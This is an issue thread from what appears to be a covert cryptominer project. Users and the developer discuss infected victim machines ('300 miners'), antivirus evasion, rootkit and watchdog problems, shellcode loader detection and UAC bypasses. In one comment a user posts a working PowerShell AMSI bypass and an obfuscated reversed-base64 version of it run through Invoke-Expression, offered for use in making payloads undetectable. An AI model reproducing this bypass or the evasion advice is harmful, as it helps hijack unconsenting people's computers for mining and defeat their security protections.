### ISSUE TITLE
When new update will be released? 

### ISSUE THREAD

**Issue by teraso11** [UnamSanctam/SilentCryptoMiner#186]
Hi Unam, can u tell us when new update will be released? This miner have some serious problems, miners from 300 miners, only 3 left after 3/4 days. Something isn't right and it is not performing as old one. Also is there any news about rootkit implementation or something new that will be in new miner? Thank you.

**Comment by UnamSanctam** [comment]
The new shellcode code I've made has now been detected so I have to recreate it. The miner currently has no other known problems than detection (that will increase after the release anyways). The most likely reason it isn't performing as the old one is because antiviruses have gotten a lot better since then, especially Windows Defender so the reason doesn't have to do with the miner itself.

There are a few new things such as the Ghost Rider algorithm (Raptoreum) updates to the rootkit, RandomX (XMR) RAM clear during stealth, more web panel integration, shellcode loader rewrite, general code changes and a few other things.

**Comment by teraso11** [comment]
Wow great updates. But strange thing is that I know at least 70% of those pcs have their av fully disabled but probably it is something to do with loader detected. Do you have any aprox. time for release? Is loader rewrite only thing left?

**Comment by LelouchViBri** [comment]
it's probably a good idea to add an option to update the file through an url to keep it undetected and avoid losing clients

**Comment by UnamSanctam** [comment]
> Wow great updates. But strange thing is that I know at least 70% of those pcs have their av fully disabled but probably it is something to do with loader detected. Do you have any aprox. time for release? Is loader rewrite only thing left?

Hmm, well the shellcode loader is the only big thing left, I've had to remade it twice now after it gets detected after a few days of other development (I have to test detections with Windows Defender Cloud Protection enabled since all users have that, and that of course causes the file to get sent to Microsoft so that's probably why it gets detected). Not sure what way I'm going to do it now, the detection problem seems to mostly be due to tcc (the compiler) but there isn't really any alternatives.

> it's probably a good idea to add an option to update the file through an url to keep it undetected and avoid losing clients

The problem with that is that there's a huge margin of error, for example if you accidentally upload a non-working file then all your clients will break (since they will update to the new version). It would also mean that the old miner would have to uninstall itself first since the "Startup" settings could be different between versions.

Using a RAT to do this instead is just the better way of doing it all around.

**Comment by AspectKraken** [comment]
and can u make a option where rather than installing in appdata,userprofile or temp its uses a *uac bypass* and binds it self with *system32* program preferably *cmd* or other important

**Comment by AspectKraken** [comment]
because a program needing admin is way more alarming then one that doesnt

**Comment by AspectKraken** [comment]
and u said that rootkit might run into problems with the watchdog in the next build can u make it that we are assured it wont?

**Comment by UnamSanctam** [comment]
> and can u make a option where rather than installing in appdata,userprofile or temp its uses a _uac bypass_ and binds it self with _system32_ program preferably _cmd_ or other important

> because a program needing admin is way more alarming then one that doesnt

I don't believe there are any reliable undetected UAC bypasses that work for all Windows versions between Windows 7 and Windows 11. The problem with binding the miner together with real Windows programs and replacing them is that it's usually detected by antiviruses, and updates/troubleshooting tools will also restore the real version thus removing the miner.

> and u said that rootkit might run into problems with the watchdog in the next build can u make it that we are assured it wont?

No I said that on some computers the watchdog doesn't work with the rootkit in the current version. I believe I have "fixed" it in the next version I'm developing though I can't be fully sure because I cannot test it since the watchdog has always (current release included) worked fine with the rootkit on my computer.

**Comment by AspectKraken** [comment]
there are some uac bypasses i have found that work on all systems/pc. as long as the system/pc has administrator 
and can u add options to make your compiled payload ps1 or cmd or batch since i know soo many ways i can turn them into fud

**Comment by AspectKraken** [comment]
and are u looking for help since there is way too much to be done, not saying i know coding but i got the time to learn it

**Comment by AspectKraken** [comment]
idk what how shellcode or powershell works and everything but heres a simple amsi bypass i found
$a = 'System.Management.Automation.A';$b = 'ms';$u = 'Utils'
$assembly = [Ref].Assembly.GetType(('{0}{1}i{2}' -f $a,$b,$u))
$field = $assembly.GetField(('a{0}iInitFailed' -f $b),'NonPublic,Static')
$field.SetValue($null,$true)
heres after i used a powershell encryption program
$best64code = "K0QfpgGdn5WZM5CdzRCLwwCdzRCKlRXaydlLtNHJ7kSKxYiPyACZkACellGKoMXZ0lnQ0V2RukSSJN0UBpjOddmbpR2bj5WZuQHelR3Wo0DdzRyOpkGJsADL0JGJocmbpJHdTRXZH5SKn5Wak92YuVUSJN0UB5Cd4VGVgQ3YlpmYP1ydl5EK9QGJ7sXKwASZu1CIpkCa0dmblxkL0JGJsADL0JGJoQWYlJlLtNHJ9kGJogSZslGa3tTfwsXJ8VzM1UjNu4CM9QnYk0VXbVGd5J2W7kCKtFWZyR3U0V2RukSK1UTNsIyMuADMx4CO2EjLykTMigCduVWasNEUDRlLzRXZrN2bT5Cdl5EI0NWZqJ2TtcXZOhSPtNHJ"
$base64 = $best64code.ToCharArray() ; [array]::Reverse($base64) ; -join $base64 2>&1> $null
$LoadCode = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("$base64"))
Invoke-Expression $LoadCode

**Comment by AspectKraken** [comment]
u could try them in vm and they will work the same for the programs dm me in discord Aspect#6677
if u dont got a discord accounts get a temp email and make one

**Comment by teraso11** [comment]
Great Unam, so it will be in next few days?

**Comment by teraso11** [comment]
> u could try them in vm and they will work. if u want the src for the programs dm me in discord Aspect#6677 because i dont want some random dude to use it like a thousand times so then it doesnt stay fud if u dont got a discord account get a temp email and make one

Can you accept discord friend request bro?

**Comment by nomad1420** [comment]
> u could try them in vm and they will work. if u want the src for the programs dm me in discord Aspect#6677 because i dont want some random dude to use it like a thousand times so then it doesnt stay fud if u dont got a discord account get a temp email and make one

IM SEND FRİEND REQUESTING BROOO

**Comment by ssk666** [comment]
> > u could try them in vm and they will work. if u want the src for the programs dm me in discord Aspect#6677 because i dont want some random dude to use it like a thousand times so then it doesnt stay fud if u dont got a discord account get a temp email and make one
> 
> Can you accept discord friend request bro?

he was banned there

**Comment by ssk666** [comment]
> Great Unam, so it will be in next few days?

he has a lot of work in real life and has no enough free time to do this

**Comment by UnamSanctam** [comment]
The new miner and web panel updates have now been released, there are also a lot of other features which are half done.
